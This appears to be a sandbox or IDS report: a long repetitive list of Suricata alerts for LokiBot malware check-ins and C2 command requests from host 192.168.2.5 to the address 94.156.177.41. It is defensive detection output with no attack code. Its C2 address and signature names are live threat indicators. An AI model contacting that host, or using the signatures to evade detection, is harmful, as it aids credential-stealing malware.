Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49790 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49884 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49884 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49884 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49884 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49884 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49821 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49821 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49821 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49934 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49934 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49934 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49934 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49934 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49821 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49821 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49919 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49919 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49919 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49919 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49919 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49840 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49761 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49961 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49953 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49953 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49953 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49953 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49711 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49974 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49953 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49968 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49869 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49945 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49993 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50002 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50002 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50002 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49722 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50002 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50002 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49891 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50016 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50043 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50058 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50050 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50055 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50063 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50079 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50078 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50059 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50081 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50066 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50056 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50049 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50049 -> 94.156.177.41:80
